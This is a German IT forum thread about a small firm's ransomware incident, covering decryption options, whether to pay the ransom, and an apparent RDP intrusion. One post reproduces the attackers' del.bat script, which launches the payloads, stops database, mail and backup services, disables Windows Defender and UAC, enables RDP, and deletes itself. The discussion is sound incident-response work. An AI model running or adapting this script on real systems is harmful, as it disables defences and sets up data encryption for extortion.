Squire 261 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 Hallo Leute, ich kann das Jahr gleich mit einer kleinen Herausforderung anfangen. Am 31.12. wurde ich von einem Neukunden angerufen, dass sein Server verschlüsselt ist ... Wie sich herrausstellte - absoluter worst case ... alles was man nicht machen sollte liegt hier vor ... Kleine Firma, die mit - festhalten - Windows 2011 HomeServer (EOL 2016) arbeitet Backup des ERP Systems liegt nur auf dem Server (auf nem 2. Raid1) Virenschutz ... irgend ein ComodoAV ... uralt von 2013 ... H-Mailserver mit Mailstore Home (nicht revisionssicher und für betriebliche Nutzung lizenzrechtlich nicht erlaubt) Es gibt kein Backup, auch kein Teilbackup. Die verschlüsselten Dateien weisen die Endung .cryptolocker auf. Laut NoRansomwareProjekt würde das auf CryptXXX V1-V3 hinweisen ... Das Entschlüsselungstool von Trendmicro versagt allerdings der Erpressertext lautet: Zitat Welcome. All files on your network have been encrypted. Backups were also encrypted or deleted. This process hasnt corrupted your files, it just modified them. Please note that this modification is reversible. ........... Glück im Unglück ... es scheint, dass die SQL DB des ERP Programms nicht verschlüsselt ist ... und dass die bis 7.1. Werksurlaub haben ... ich werd die Kiste jetzt erst mal abgesichert hochfahren und die Ransomware beseitigen ... Achja ... die Polizei hat dringend davon abgeraten "Lösegeld" zu zahlen ... die wollen wohl so um die 4800$ ... hat jemand nen Tipp für eine etwaige Entschlüsselung ... ich jeweils einer der Raid1 Platten mittels einer Diskstation auf zwei Platten von mir geklont - damit kann ich dann gefahrlos testen ... Auf alle Fälle erstell ich dem Kunden dann mal ein richtiges IT Konzept und Angebot mit aktueller Hardware, Software, Virenschutz und Backup! Die Firma, die das vorher eingerichtet hat - hat schlicht und ergreifend grob fahrlässig gehandelt ... vom lizenzrechtlichen Dingen will ich mal gar nicht erst reden! ich schüttel immer noch innerlich den Kopf 1 Zitieren Link zu diesem Kommentar
MrCocktail 192 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 Hi, zumindest einmal die Option zu Zahlen überdenken, in 2 Fällen haben es Kunden von einem Bekannten getan und die Daten waren schnell entschlüsselt... Besser wäre natürlich ein vernünftiges Konzept, dass so etwas nicht passiert. Gruß J Zitieren Link zu diesem Kommentar
MurdocX 950 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 vor 1 Stunde schrieb Squire: der Erpressertext lautet: Vielleicht wäre es gut, wenn die Erpresser-Links nicht in einer Nachricht vorhanden sind Für Kriminelle brauchen wir ja keine Werbung machen. vor 5 Minuten schrieb MrCocktail: 2 Fällen haben es Kunden von einem Bekannten getan Ohne die Umstände zu kennen, halte ich das vorgehen für äußerst kritisch. In der Masse lohnt sich das dann für die Erpresser und es wird immer so weitergehen. Zitieren Link zu diesem Kommentar
Squire 261 Geschrieben 2. Januar 2020 Autor Melden Teilen Geschrieben 2. Januar 2020 ich hab sie rausgenommen ... Werbung war das nicht Zitieren Link zu diesem Kommentar
SandyB 9 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 (bearbeitet) Hast du ein Incident Management mit entsprechenden Prozessen im Rücken? Rein technisch würde ich mir, sofern nicht bereits die malware vorlegt, bei virustotal ein sample von cryptxxx besorgen und versuchen zu analysieren. Dann kann man sehen, wie das ding überhaupt arbeitet. bearbeitet 2. Januar 2020 von SandyB Zitieren Link zu diesem Kommentar
Squire 261 Geschrieben 2. Januar 2020 Autor Melden Teilen Geschrieben 2. Januar 2020 (bearbeitet) Incident Management ... der war gut das bin ich dann wohl selbst ich hab vorhin noch mal andere Dateien gecheckt ... CryptoXXX scheint es nicht zu sein ... da findet kein Decryptor irgendwas ... Emisoft wirft als Ransomware RAPID aus - dafür gibt es keinen decryptor. was ich bisher gefunden hab, wie er sich aktiv setzt ... wie das Teil reingekommen ist ist mir noch unklar - der Kunde behauptet nix geklickt zu haben ... ich hab folgende Datei im Download des Admins unter einem Verzeichnis RRR gefunden - die Exes hat er wohl mit einem AV Scan geschreddert del.bat @echo off START "" %~dp0\RRLL.exe -all START "" %~dp0\NS.exe START "" %~dp0\p.exe net stop MSSQLServerADHelper100 net stop MSSQL$ISARS net stop MSSQL$MSFW net stop SQLAgent$ISARS net stop SQLAgent$MSFW net stop SQLBrowser net stop ReportServer$ISARS net stop SQLWriter net stop WinDefend net stop mr2kserv net stop MSExchangeADTopology net stop MSExchangeFBA net stop MSExchangeIS net stop MSExchangeSA net stop ShadowProtectSvc net stop SPAdminV4 net stop SPTimerV4 net stop SPTraceV4 net stop SPUserCodeV4 net stop SPWriterV4 net stop SPSearch4 net stop MSSQLServerADHelper100 net stop IISADMIN net stop firebirdguardiandefaultinstance net stop ibmiasrw net stop QBCFMonitorService net stop QBVSS net stop QBPOSDBServiceV12 net stop "IBM Domino Server (CProgramFilesIBMDominodata)" net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)" net stop IISADMIN net stop "Simply Accounting Database Connection Manager" net stop QuickBooksDB1 net stop QuickBooksDB2 net stop QuickBooksDB3 net stop QuickBooksDB4 net stop QuickBooksDB5 net stop QuickBooksDB6 net stop QuickBooksDB7 net stop QuickBooksDB8 net stop QuickBooksDB9 net stop QuickBooksDB10 net stop QuickBooksDB11 net stop QuickBooksDB12 net stop QuickBooksDB13 net stop QuickBooksDB14 net stop QuickBooksDB15 net stop QuickBooksDB16 net stop QuickBooksDB17 net stop QuickBooksDB18 net stop QuickBooksDB19 net stop QuickBooksDB20 net stop QuickBooksDB21 net stop QuickBooksDB22 net stop QuickBooksDB23 net stop QuickBooksDB24 net stop QuickBooksDB25 taskkill /f /im mysql* taskkill /f /im IBM* taskkill /f /im bes10* taskkill /f /im black* taskkill /f /im sql taskkill /f /im store.exe taskkill /f /im sql* taskkill /f /im vee* taskkill /f /im postg* taskkill /f /im sage* REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f del %0 bearbeitet 2. Januar 2020 von Squire Zitieren Link zu diesem Kommentar
falkebo 21 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 Ich würde mir keine großen Hoffnungen mehr machen die Daten irgendwie entschlüsselt zu bekommen. Meistens hat man noch eine Chance solange der Server/Rechner nicht heruntergefahren wurde, da viele Ransomwares den Key im RAM nicht clearen. Aus betriebswirtschaftlicher Sicht muss man in so einer Situation den Punkt ganz klar überdenken. vor 4 Stunden schrieb Squire: Achja ... die Polizei hat dringend davon abgeraten "Lösegeld" zu zahlen ... die wollen wohl so um die 4800$ ... Der Kunde hat seine IT über Jahre wohl total vernachlässigt und steht jetzt mit heruntergelassenen Hosen da, selber schuld. Zitieren Link zu diesem Kommentar
DocData 85 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 Joar, Insolvenz anmelden wäre mal eine Maßnahme. Oder Lösegeld zahlen. Dad Geschäftsmodell basiert darauf nach Bezahlung zu entschlüsseln. Sonst würde niemand zahlen. Zitieren Link zu diesem Kommentar
MurdocX 950 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 vor 1 Minute schrieb DocData: Joar, Insolvenz anmelden wäre mal eine Maßnahme. Wer bei 4800$ Insolvenz anmelden muss, der hat wohl ganz andere Probleme Die großen Kosten kommen erst danach... Zitieren Link zu diesem Kommentar
falkebo 21 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 (bearbeitet) vor 9 Minuten schrieb MurdocX: vor 11 Minuten schrieb DocData: Joar, Insolvenz anmelden wäre mal eine Maßnahme. Wer bei 4800$ Insolvenz anmelden muss, der hat wohl ganz andere Probleme Deswegen hat er ja auch geschrieben Insolvenz anmelden (da die Wiederherstellung sehr sehr unwahrscheinlich ist) ODER bezahlen ;) Hier noch ein Leitfaden des BSI zum Thema Ransomware:https://www.bsi.bund.de/DE/Themen/Cyber-Sicherheit/Empfehlungen/Ransomware/Ransomware_node.html Hier noch 2 Links die helfen könnten:https://www.nomoreransom.org/de/index.html https://id-ransomware.malwarehunterteam.com/ bearbeitet 2. Januar 2020 von falkebo Zitieren Link zu diesem Kommentar
DocData 85 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 vor 8 Minuten schrieb MurdocX: Wer bei 4800$ Insolvenz anmelden muss, der hat wohl ganz andere Probleme Die großen Kosten kommen erst danach... Insolvenz kann und muss auch dan angemeldet werden wenn das Unternehmen nachhaltig nicht mehr in der Lage ist den Geschäftsbetrieb aufrecht zu erhalten. Zitieren Link zu diesem Kommentar
Squire 261 Geschrieben 2. Januar 2020 Autor Melden Teilen Geschrieben 2. Januar 2020 No More Ransomware kannte ich schon ... zumindest scheint die SQL DB nicht verschlüsselt zu sein ... normales MDF File. Was mich jetzt ein wenig wundert ist, dass ich keinen aktiven Trojaner etc. finde ... nix in den Autorun Schlüsseln etc ... Kann das sein, dass die sich nach erfolgreichen Verschlüsseln selbst wieder rauskicken? Vielleicht ist noch was mit einem SystemRestore Point was zu holen ... ich hatte vorhin den Kunden schon mal telefonisch informiert, dass es dunkel ausschaut ... Für mich heißt das dann wohl am Wochenende ein hübsches Angebot für Server, Software, Backup, AV und Lizenzen zu machen ... das gibt es nicht für 3.50€ Zitieren Link zu diesem Kommentar
falkebo 21 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 vor 3 Minuten schrieb Squire: Für mich heißt das dann wohl am Wochenende ein hübsches Angebot für Server, Software, Backup, AV und Lizenzen zu machen ... das gibt es nicht für 3.50€ Wenn das Kind bereits in den Brunnen gefallen ist, sind die Kunden meistens bereit alles zu bezahlen Zitieren Link zu diesem Kommentar
MrCocktail 192 Geschrieben 2. Januar 2020 Melden Teilen Geschrieben 2. Januar 2020 Hi, auch wenn es jetzt b***d klingt, hast du dir die Seite im TOR Browser mal angeschaut? Meist ist da auch noch ein Link zu Hilfe, und ja, solange die Software wirklich aktiv ist und nicht nur noch Reste durch Zufall durchs Web gehen, entschlüsseln die wirklich und leisten im Zweifel sogar einen nicht so schlechten Support, ob man so etwas jetzt unterstützen will / muss / kann ist dann noch eine andere frage. Zitieren Link zu diesem Kommentar
Squire 261 Geschrieben 2. Januar 2020 Autor Melden Teilen Geschrieben 2. Januar 2020 (bearbeitet) das muss der Kunde entscheiden, ob er zahlt oder nicht. Ich bin in diesem Fall externer Dienstleister und hab den Kunden vorher auch nicht betreut ... Ich war am 31.12. zum ersten mal bei ihm ... so wie es ausschaut, hört er auf die Polizei und will nicht zahlen ... Anscheinend wurde er gehackt. Ich hab im Eventlog wurden RDP Verbindungen von externen IPs gelogged. Laut Kunde ist RDP nach außen aber nicht offen ... bearbeitet 2. Januar 2020 von Squire Zitieren Link zu diesem Kommentar
Empfohlene Beiträge
Schreibe einen Kommentar
Du kannst jetzt antworten und Dich später registrieren. Falls Du bereits ein Mitglied bist, logge Dich jetzt ein.